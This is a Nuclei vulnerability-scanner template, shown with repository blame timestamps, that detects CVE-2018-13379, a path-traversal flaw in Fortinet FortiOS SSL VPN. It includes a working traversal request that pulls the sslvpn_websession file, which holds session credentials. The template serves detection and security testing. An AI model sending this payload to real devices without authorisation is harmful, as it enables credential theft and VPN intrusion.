nuclei-templates/cves/2018/CVE-2018-13379.yaml

29 lines
1018 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-13379
2020-04-22 06:42:01 +00:00
info:
name: Fortinet FortiOS - Credentials Disclosure
2020-04-22 06:42:01 +00:00
author: organiccrap
severity: critical
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
reference:
- https://fortiguard.com/advisory/FG-IR-18-384
- https://www.fortiguard.com/psirt/FG-IR-20-233
-
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-13379
cwe-id: CWE-22
tags: cve,cve2018,fortios
2020-04-22 06:42:01 +00:00
requests:
- method: GET
2020-05-25 07:49:06 +00:00
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
2020-04-22 06:42:01 +00:00
matchers:
- type: word
2020-05-25 07:49:06 +00:00
words:
2021-02-23 20:47:27 +00:00
- "var fgt_lang"
# Enhanced by mp on 2022/05/12